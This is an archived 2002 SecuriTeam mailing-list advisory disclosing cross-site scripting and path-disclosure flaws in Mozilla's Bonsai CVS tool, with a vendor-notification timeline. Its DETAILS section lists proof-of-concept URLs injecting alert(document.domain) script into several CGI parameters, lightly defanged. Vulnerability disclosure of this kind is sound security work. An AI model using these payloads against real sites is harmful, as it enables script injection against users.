[UNIX] Bonsai XSS and Physical Path Revealing Vulnerabilities
From: support@securiteam.comDate: 08/20/02
- Previous message: support@securiteam.com: "[NT] Internet Explorer Can Read Local Files (XML Datasource)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Tue, 20 Aug 2002 09:05:12 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Bonsai XSS and Physical Path Revealing Vulnerabilities
------------------------------------------------------------------------
SUMMARY
<http://www.mozilla.org/bonsai.html> Bonsai is a tool that lets you
perform queries on the contents of a CVS archive. The product has been
found to contain multiple cross-site scripting vulnerabilities, and to
contain a vulnerability that would allow an attacker to reveal the
physical path of the Bonsai scripts.
DETAILS
CSS Problems:
/webtools/bonsai/cvslog.cgi?file=*&rev=&root=<scr!pt>alert(document.domain)</script>
/webtools/bonsai/cvslog.cgi?file=<scr!pt>alert(document.domain)</script>
/webtools/bonsai/cvsblame.cgi?file=/index.html&root=<scr!pt>alert(document.domain)</script>
/webtools/bonsai/cvsblame.cgi?file=<scr!pt>alert(document.domain)</script>
/cvsquery.cgi?branch=<scr!pt>alert(document.domain)</script>&file=<scr!pt>alert(document.domain)</script>&date=<scr!pt>alert(document.domain)</script>
/cvsquery.cgi?module=<scr!pt>alert(document.domain)</script>&branch=&dir=&file=&who=<scr!pt>alert(document.domain)</script>&sortby=Date&hours=2&date=week
/showcheckins.cgi?person=<scr!pt>alert(document.domain)</script>
/cvsqueryform.cgi?cvsroot=/cvsroot&module=<scr!pt>alert(document.domain)</script>&branch=HEAD
(NOTE, the letter I has been replaced with an !)
Physical Path Revealing and CSS:
/bonsai/cvslog.cgi?file=/index.html&rev=<scr!pt>alert(document.domain)</script>&root=/cvsroot/
Physical Path Revealing only:
/bonsai/cvsview2.cgi
/bonsai/multidiff.cgi
As you can see there are many ways to display the problems although many
are related to error output subroutines and just some subroutines in
general which do not properly filter input. The physical paths are
revealed in some instances because of perl error messages (it appears)
being thrown directly onto the webpage thus revealing physical paths.
Vendor notification:
Notification of the vulnerability was sent to the Mozilla team on August
5, 2002. After receiving no response on the matter, Stan Bubrouski sent
another message on August 7 and Stan Bubrouski received a brief response
from someone the same day. The problem still exists on mozilla.org and no
changes have been made to Bonsai CVS to this very day. The fix seems
simple, but since Stan Bubrouski did not have a system to test with he
could not offer any solution.
ADDITIONAL INFORMATION
The information has been provided by <mailto:stan@ccs.neu.edu> Stan
Bubrouski.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NT] Internet Explorer Can Read Local Files (XML Datasource)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
